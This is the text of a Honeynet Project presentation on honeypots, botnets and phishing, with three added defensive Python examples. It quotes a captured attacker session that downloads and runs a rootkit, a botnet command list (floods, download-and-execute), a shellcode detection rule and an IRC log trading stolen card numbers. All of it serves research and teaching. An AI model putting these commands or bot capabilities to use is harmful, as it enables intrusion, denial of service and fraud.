Honeynets and The Honeynet Project


Honeynets and
The Honeynet Project
Speaker
2
Purpose
To explain our organization, our value to
you, and our research.
3
Agenda
• The Honeynet Project and Research
Alliance
• The Threat
• How Honeynets Work
• Learning More
4
Honeynet Project
5
Problem
How can we defend against an enemy, when
we don’t even know who the enemy is?
6
Mission Statement
To learn the tools, tactics, and motives
involved in computer and network
attacks, and share the lessons learned.
7
Our Goal
Improve security of Internet at no cost to the
public.
• Awareness: Raise awareness of the threats
that exist.
• Information: For those already aware, we teach
and inform about the threats.
• Research: We give organizations the
capabilities to learn more on their own.
8
Honeynet Project
• Non-profit (501c3) organization with Board of
Directors.
• Funded by sponsors
• Global set of diverse skills and experiences.
• Open Source, share all of our research and findings at
no cost to the public.
• Deploy networks around the world to be hacked.
• Everything we capture is happening in the wild.
• We have nothing to sell.
9
Honeynet Research Alliance
Starting in 2002, the Alliance is a forum of
organizations around the world actively
researching, sharing and deploying
honeypot technologies.
http://www.honeynet.org/alliance/
10
Alliance Members
• South Florida Honeynet Project
• Georgia Technical Institute
• Azusa Pacific University
• USMA Honeynet Project
• Pakistan Honeynet Project
• Paladion Networks Honeynet Project (India)
• Internet Systematics Lab Honeynet Project (Greece)
• Honeynet.BR (Brazil)
• UK Honeynet
• French Honeynet Project
• Italian Honeynet Project
• Portugal Honeynet Project
• German Honeynet Project
• Spanish Honeynet Project
• Singapore Honeynet Project
• China Honeynet Project
11
The Threat
12
What we have captured
• The Honeynet Project has captured primarily
external threats that focus on targets of
opportunity.
• Little has yet been captured on advanced
threats; few honeynets to date have been
designed to capture them.
13
The Threat
• Hundreds of scans a day.
• Fastest manual compromise of a honeypot:
15 minutes (by a worm: under 60 seconds).
• Life expectancies: vulnerable Win32 system is
under three hours, vulnerable Linux system is
three months.
• Primarily cyber-crime, focus on Win32 systems
and their users.
• Attackers can control thousands of systems
(Botnets).
14
The Threat
15
The Motive
• Motives vary, but we are seeing more and
more criminally motivated.
• Several years ago, hackers hacked
computers. Now, criminals hack
computers.
• Fraud, extortion and identity theft have
been around for centuries, the net just
makes it easier.
16
DDoS for Money
J4ck: why don't you start charging for packet attacks?
J4ck: "give me x amount and I'll take bla bla offline
for this amount of time”
J1LL: it was illegal last I checked
J4ck: heh, then everything you do is illegal. Why not
make money off of it?
J4ck: I know plenty of people that'd pay exorbitant
amounts for packeting
17
The Target
• The mass users.
• Tend to be non-security aware, making
them easy targets.
• Economies of scale (it’s a global target).
18
Interesting Trends
• Attacks often originate from economically
depressed countries (Romania is an
example).
• Attacks shifting from the computer to the
user (computers getting harder to hack).
• Attackers continue to get more
sophisticated.
19
The Tools
• Attacks used to be primarily worms and
autorooters.
• New advances include Botnets and
Phishing.
• Tools are constantly advancing.
20
The Old Days
Jan  8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR
Jan  8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan  8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR
Jan  8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu
Jan  8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L
Jan  8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR
Jan  8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot
Jan  8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210
Jan  8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120
Jan  8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120
Jan  8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
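The keystroke log on this slide is what a honeynet's data-capture layer hands to the analyst: one HISTORY record per keystroke line, keyed by PID and UID. The following parser, an added example that is not part of the original slides or of any Honeynet Project tool, reads records in that format, groups them into shell sessions and flags the things an analyst looks for first (a root shell, a tool download, an archive being unpacked, a local binary being run). The sample log is constructed; its hostnames and tool names are placeholders, not the ones captured on the slide.

```python
import re
from collections import defaultdict

# One Sebek-style keystroke record:
#   "<Mon> <day> <HH:MM:SS> HISTORY: PID=<n> UID=<n> <keystrokes>"
LINE_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2})\s+(?P<time>\d{2}:\d{2}:\d{2})\s+"
    r"HISTORY:\s+PID=(?P<pid>\d+)\s+UID=(?P<uid>\d+)\s*(?P<keys>.*)$"
)

# Constructed sample log in the slide's format (placeholder host and tool names).
SAMPLE_LOG = """\
Jan  8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.example.invalid/TOOLKIT.TAR
Jan  8 18:48:31 HISTORY: PID=1246 UID=0 y
Jan  8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz TOOLKIT.TAR
Jan  8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf TOOLKIT.TAR
Jan  8 18:49:01 HISTORY: PID=1246 UID=0 cd toolkit
Jan  8 18:49:03 HISTORY: PID=1246 UID=0 ./scanner 10 20
Jan  8 18:49:06 HISTORY: PID=1246 UID=0 ./scanner 10 30
Jan  8 18:51:07 HISTORY: PID=1302 UID=500 ls -la
this line is not a HISTORY record and is skipped
"""

# Programs whose appearance at the start of a command usually means a tool download.
DOWNLOADERS = {"wget", "curl", "lynx", "ftp", "tftp"}


def parse_history(text):
    """Return one dict per well-formed HISTORY record; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m is None:
            continue
        rec = m.groupdict()
        rec["pid"] = int(rec["pid"])
        rec["uid"] = int(rec["uid"])
        records.append(rec)
    return records


def group_sessions(records):
    """Group keystroke lines by (pid, uid), i.e. by shell session, keeping order."""
    sessions = defaultdict(list)
    for rec in records:
        sessions[(rec["pid"], rec["uid"])].append(rec["keys"])
    return dict(sessions)


def summarize_session(uid, commands):
    """Flag root activity, downloads, archive extraction and local binaries run."""
    summary = {"root": uid == 0, "downloads": [], "extracted": [], "executed": []}
    for cmd in commands:
        parts = cmd.split()
        if not parts:
            continue
        prog = parts[0]
        if prog in DOWNLOADERS:
            summary["downloads"].append(cmd)
        elif prog == "tar":
            summary["extracted"].append(cmd)
        elif prog.startswith("./"):
            summary["executed"].append(cmd)
    return summary


def analyze(text):
    """Full pipeline: raw log text -> {(pid, uid): summary}."""
    return {
        key: summarize_session(key[1], cmds)
        for key, cmds in group_sessions(parse_history(text)).items()
    }


if __name__ == "__main__":
    for key, summary in analyze(SAMPLE_LOG).items():
        print(key, summary)
```

Session grouping by (PID, UID) is the point: the same PID with UID 0 after a UID 500 session is the sign of a privilege escalation, and a download followed within seconds by tar and ./ execution is the classic "fetch, unpack, run" sequence the slide shows.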
21
Botnets
• Large networks of hacked systems.
• Often thousands, if not tens of thousands,
of hacked systems under the control of a
single user.
• Automated commands used to control the
‘zombies’.
22
How They Work
• After successful exploitation, a bot uses TFTP,
FTP, or HTTP to download itself to the
compromised host.
• The binary is started, and connects to the hardcoded master IRC server.
• Often a dynamic DNS name is provided rather
than a hard coded IP address, so the bot can be
easily relocated.
• Using a specially crafted nickname like
USA|743634, the bot joins the master's channel,
sometimes using a password to keep strangers
out of the channel.
23
80% of traffic
• Port 445/TCP
• Port 139/TCP
• Port 135/TCP
• Port 137/UDP
• Infected systems most often WinXP-SP1
and Win2000
24
Bots
ddos.synflood [host] [time] [delay] [port]
starts a SYN flood
ddos.httpflood [url] [number] [referrer] [recursive = true||false]
starts an HTTP flood
scan.listnetranges
list scanned netranges
scan.start
starts all enabled scanners
scan.stop
stops all scanners
http.download
download a file via HTTP
http.execute
updates the bot via the given HTTP URL
http.update
executes a file from a given HTTP URL
cvar.set spam_aol_channel [channel]
AOL Spam - Channel name
cvar.set spam_aol_enabled [1/0]
AOL Spam - Enabled?
25
Numbers
• Over a 4-month period
• More than 100 Botnets were tracked
• One channel had over 200,000 IP
addresses.
• One computer was compromised by 16
Bots.
• Estimated over 1 million systems
compromised.
26
Botnet Economy
• Botnets sold or for rent.
• Saw Botnets being stolen from each other.
• Observed harvesting of information from
all compromised machines. For example,
the operator of the botnet can request a
list of CD-keys (e.g. for Windows or
games) from all bots. These CD-keys can
be sold or used for other purposes since
they are considered valuable information.
27
Phishing
• Social engineer victims to give up valuable
information (login, password, credit card number,
etc).
• Easier to hack the user than the computers.
• Need attacks against instant messaging.
http://www.antiphishing.org
28
The Sting
29
Getting the Info
30
Infrastructure
• Attackers build network of thousands of
hacked systems (often botnets).
• Upload pre-made packages for Phishing.
• Use platforms for sending out spoofed
email.
• Use platforms for false websites.
31
A Phishing Rootkit
-rw-r--r-- 1 free web  14834 Jun 17 13:16 ebay only
-rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
-rw-r--r-- 1 free web   7517 Jun 11 11:53 html1.zip
-rw-r--r-- 1 free web  10383 Jul  3 19:07 index.html
-rw-r--r-- 1 free web    413 Jul 18 22:09 index.zip
-rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
-rw-r--r-- 1 free web   8192 Jun 12 07:18 massmail.zip
-rw-r--r-- 1 free web  12163 Jun  9 01:31 send.php
-rw-r--r-- 1 free web   2094 Jun 20 11:49 sendspamAOL1.tgz
-rw-r--r-- 1 free web   2173 Jun 14 22:58 sendspamBUN1.tgz
-rw-r--r-- 1 free web   2783 Jun 15 00:21 sendspamBUNzip1.zip
-rw-r--r-- 1 free web   2096 Jun 16 18:46 sendspamNEW1.tgz
-rw-r--r-- 1 free web   1574 Jul 11 01:08 sendbank1.tgz
-rw-r--r-- 1 free web   2238 Jul 18 23:07 sendbankNEW.tgz
-rw-r--r-- 1 free web  83862 Jun  9 09:56 spamz.zip
-rw-r--r-- 1 free web  36441 Jul 18 00:52 usNEW.zip
-rw-r--r-- 1 free web  36065 Jul 11 17:04 bank1.tgz
drwxr-xr-x 2 free web     49 Jul 16 12:26 banka
-rw-r--r-- 1 free web 301939 Jun  8 13:17 www1.tar.gz
-rw-r--r-- 1 free web 327380 Jun  7 16:24 www1.zip
32
Credit Cards Exchanging
04:55:16 COCO_JAA: !cc
04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box
126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All
This ccs update everyday From My Hacked shopping Database - You must
regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9)
04:55:42 COCO_JAA: !cclimit 4407070000588951
04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard
(5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS
Chk_bot FoR #channel)
04:56:55 COCO_JAA: !cardablesite
04:57:22 COCO_JAA: !cardable electronics
04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics :
*** 9(11 TraDecS Chk_bot FoR #goldcard9)
04:58:09 COCO_JAA: !cclimit 4234294391131136
04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) :
9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
33
The Future
• Hacking is profitable, and it is difficult to get
caught.
• Expect more attacks to focus on the end
user or the client.
• Expect things to get worse, bad guys
adapt faster.
34
Honeynets
35
Honeypots
• A honeypot is an information system resource
whose value lies in unauthorized or illicit use of
that resource.
• Has no production value, anything going to or from
a honeypot is likely a probe, attack or compromise.
• Primary value to most organizations is information.
36
Advantages
• Collect small data sets of high value.
• Reduce false positives
• Catch new attacks (false negatives)
• Work in encrypted or IPv6 environments
• Simple concept requiring minimal resources.
37
Disadvantages
• Limited field of view (microscope)
• Risk (mainly high-interaction honeypots)
38
Types
• Low-interaction
• Emulates services, applications, and OS’s.
• Low risk and easy to deploy/maintain, but
capture limited information.
• High-interaction
• Real services, applications, and OS’s
• Capture extensive information, but high
risk and time intensive to maintain.
39
Examples of Honeypots
Low Interaction
• BackOfficer Friendly
• KFSensor
• Honeyd
High Interaction
• Honeynets
40
Honeynets
• High-interaction honeypot designed to capture
in-depth information.
• Information has different value to different
organizations.
• It's an architecture you populate with live
systems, not a product or software.
• Any traffic entering or leaving is suspect.
41
How it works
A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.
• Data Control
• Data Capture
• Data Analysis
http://www.honeynet.org/papers/honeynet/
42
Honeynet Architecture
43
Data Control
• Mitigate risk of honeynet being used to
harm non-honeynet systems.
• Count outbound connections.
• IPS (Snort-Inline)
• Bandwidth Throttling*
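Counting outbound connections is the simplest of the three data-control mechanisms on this slide: the gateway lets the honeypot accept anything inbound, but once a honeypot opens more than its budget of new outbound connections in a time window, further ones are dropped and logged. The class below is an added illustration of that logic, not the Honeywall's rc.firewall or hwctl code; the per-protocol budgets, the one-hour window and the flow records are all constructed for the example (the slide's `hwctl HwTCPRATE=30` sets the real Honeywall's TCP limit, and a per-hour window is an assumption here).

```python
from collections import defaultdict, deque


class OutboundLimiter:
    """Sliding-window counter of new outbound connections per honeypot and
    protocol. Inbound traffic is never limited: the honeynet must stay
    reachable in order to be attacked. Budgets are per source address so one
    compromised honeypot cannot use up the others' allowance."""

    def __init__(self, limits, window_seconds=3600):
        self.limits = {k.lower(): v for k, v in limits.items()}  # proto -> max per window
        self.window = window_seconds
        self._allowed = defaultdict(deque)  # (src, proto) -> timestamps of allowed connections
        self.dropped = []                   # log of (ts, src, proto, dst, dport) that were blocked

    def check(self, ts, src, proto, dst, dport):
        """Return 'ALLOW' or 'DROP' for one new outbound connection attempt."""
        proto = proto.lower()
        if proto not in self.limits:
            # A protocol with no configured budget is denied, not allowed by default.
            self.dropped.append((ts, src, proto, dst, dport))
            return "DROP"
        window = self._allowed[(src, proto)]
        # Expire allowed connections that fell out of the window.
        while window and ts - window[0] >= self.window:
            window.popleft()
        if len(window) >= self.limits[proto]:
            self.dropped.append((ts, src, proto, dst, dport))
            return "DROP"
        window.append(ts)
        return "ALLOW"


# Constructed outbound flow records: (seconds since start, honeypot src, proto, dst, dport).
SAMPLE_FLOWS = [
    (0,    "10.0.0.5", "tcp", "198.51.100.7",  80),
    (10,   "10.0.0.5", "tcp", "198.51.100.8",  25),
    (20,   "10.0.0.5", "tcp", "198.51.100.9",  6667),
    (30,   "10.0.0.5", "tcp", "198.51.100.10", 6667),  # over the TCP budget
    (40,   "10.0.0.5", "tcp", "198.51.100.11", 6667),  # over the TCP budget
    (45,   "10.0.0.6", "tcp", "198.51.100.7",  80),    # a second honeypot has its own budget
    (50,   "10.0.0.5", "udp", "198.51.100.53", 53),
    (55,   "10.0.0.5", "gre", "198.51.100.12", 0),     # no budget configured for GRE
    (3601, "10.0.0.5", "tcp", "198.51.100.13", 22),    # the first TCP connection has expired
]


def run_sample(limits=None):
    """Run the constructed flows through a limiter with deliberately tiny budgets
    so the effect is visible; returns (verdicts, dropped_log)."""
    limiter = OutboundLimiter(limits or {"tcp": 3, "udp": 2, "icmp": 5})
    verdicts = [limiter.check(*flow) for flow in SAMPLE_FLOWS]
    return verdicts, limiter.dropped


if __name__ == "__main__":
    for flow, verdict in zip(SAMPLE_FLOWS, run_sample()[0]):
        print(verdict, flow)
```

The trade-off the slide leaves implicit is visible in the sample: the budget must be high enough that the attacker does not notice the gateway (the first few connections succeed), yet low enough that a compromised honeypot cannot be used for a flood or a scan.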
44
No Data Control
45
Data Control
46
Snort-Inline
alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named"; flags:A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";)

alert tcp $EXTERNAL_NET any -> $HOME_NET 53
(msg:"DNS EXPLOIT named"; flags:A+;
content:"|CD80 E8D7 FFFFFF|/bin/sh";
replace:"|0000 E8D7 FFFFFF|/ben/sh";)
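The second rule is what makes Snort-Inline a data-control tool rather than a detector: the packet is let through, but the matched bytes are overwritten so the attacker sees a normal-looking connection while the payload no longer does what it was meant to. The code below is an added example, not Snort's own implementation, that parses the slide's `content`/`replace` strings (Snort's `|..|` hex notation; escaping of `;`, `"` and `\` inside the string is not handled) and applies the rewrite to a constructed payload. The one check worth remembering is the equal-length requirement: the packet is edited in place, so the replacement can never change the payload length.

```python
def parse_snort_content(spec):
    """Turn a Snort content/replace string into bytes. Text between |pipes| is
    hex (spaces allowed); everything else is taken literally."""
    out = bytearray()
    for i, chunk in enumerate(spec.split("|")):
        if i % 2 == 1:
            out += bytes.fromhex(chunk.replace(" ", ""))
        else:
            out += chunk.encode("latin-1")
    return bytes(out)


# The match and replacement strings from the rule on the slide.
CONTENT = parse_snort_content("|CD80 E8D7 FFFFFF|/bin/sh")
REPLACE = parse_snort_content("|0000 E8D7 FFFFFF|/ben/sh")


def inline_replace(payload, content, replacement):
    """Apply a snort_inline 'replace' to one payload: every occurrence of
    content is overwritten with replacement. Returns (new_payload, matches).
    Lengths must be equal: changing the length would invalidate the IP/TCP
    length fields and the TCP sequence numbers of the rest of the stream."""
    if len(content) != len(replacement):
        raise ValueError("replace string must be the same length as content")
    matches = payload.count(content)
    if matches == 0:
        return payload, 0
    return payload.replace(content, replacement), matches


def inspect(payload, content=CONTENT, replacement=REPLACE):
    """Verdict for one payload: ('alert', rewritten payload) when the rule's
    content matches, else ('pass', payload unchanged)."""
    new_payload, matches = inline_replace(payload, content, replacement)
    return ("alert" if matches else "pass"), new_payload


# Constructed payloads: a harmless DNS-shaped blob and one carrying the rule's content.
BENIGN = b"\x00\x01\x00\x00\x00\x00\x00\x00\x07example\x03com\x00"
SUSPECT = b"A" * 8 + CONTENT + b"\x00" * 4


if __name__ == "__main__":
    for name, payload in (("benign", BENIGN), ("suspect", SUSPECT)):
        verdict, rewritten = inspect(payload)
        print(name, verdict, rewritten)
```

The rewritten packet still reaches the honeypot, and the attacker's tool still reports that it sent its exploit, which is exactly what keeps the interaction going long enough to capture the follow-on activity.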
47
Data Capture
• Capture all activity at a variety of levels.
• Network activity.
• Application activity.
• System activity.
48
Sebek
• Hidden kernel module that captures all
host activity.
• Dumps activity to the network.
• Hides its own traffic: the attacker cannot
sniff packets carrying Sebek's magic number
and destination port.
49
Sebek Architecture
50
Honeywall CDROM
• Attempt to combine all requirements of a
Honeywall onto a single, bootable
CDROM.
• May, 2003 - Released Eeyore
• May, 2005 - Released Roo
51
Eeyore Problems
• OS too minimized, almost crippled. Could
not easily add functionality.
• Difficult to modify since LiveCD.
• Limited distributed capabilities
• No GUI administration
• No Data Analysis
• No international or SCSI support
52
Roo Honeywall CDROM
• Based on Fedora Core 3
• Vastly improved hardware and
international support.
• Automated, headless installation
• New Walleye interface for web based
administration and data analysis.
• Automated system updating.
53
Installation
• Just insert CDROM and boot, it installs to
local hard drive.
• After it reboots for the first time, it runs a
hardening script based on NIST and CIS
security standards.
• Following installation, you get a command
prompt and system is ready to configure.
54
First Boot
55
Install
56
Configure
57
3 Methods to Maintain
• Command Line Interface
• Dialog Interface
• Web GUI (Walleye)
58
Command Line Interface
• Local or SSH access only.
• Use the utility hwctl to modify
configurations and restart services.
# hwctl HwTCPRATE=30
59
Dialog Menu
60
Data Administration
61
Data Analysis
• Most critical part, the purpose of a
honeynet is to gather information and
learn.
• Need a method to analyze all the different
elements of information.
• Walleye is the new solution, comes with
the CDROM.
62
Walleye
63
Data Analysis
64
Data Analysis Flows
65
Data Analysis Details
66
Processes
67
Files
68
Distributed Capabilities
69
Issues
• Require extensive resources to properly
maintain.
• Detection and anti-honeynet technologies
have been introduced.
• Can be used to attack or harm other non-honeynet systems.
• Privacy can be a potential issue.
70
Legal Contact for .mil / .gov
Department of Justice; Computer Crime and
Intellectual Property Section.
• Paul Ohm
• Number: (202) 514.1026
• E-Mail: [email protected]
71
Learning More
72
Our Website
• Know Your Enemy papers.
• Scan of the Month Challenges
• Latest Tools and Technologies
http://www.honeynet.org/
73
Our Book
http://www.honeynet.org/book
74
Sponsoring
Advanced Network Management Lab
YOU?
75
How to Sponsor
• Sponsor development of a new tool
• Sponsor authorship of a new research
paper.
• Sponsor research and development.
• Buy our book
<[email protected]>
http://www.honeynet.org/funds/
76
Conclusion
The Honeynet Project is a non-profit, research
organization improving the security of the
Internet at no cost to the public by providing
tools and information on cyber security threats.
77
http://www.honeynet.org
<[email protected]>
78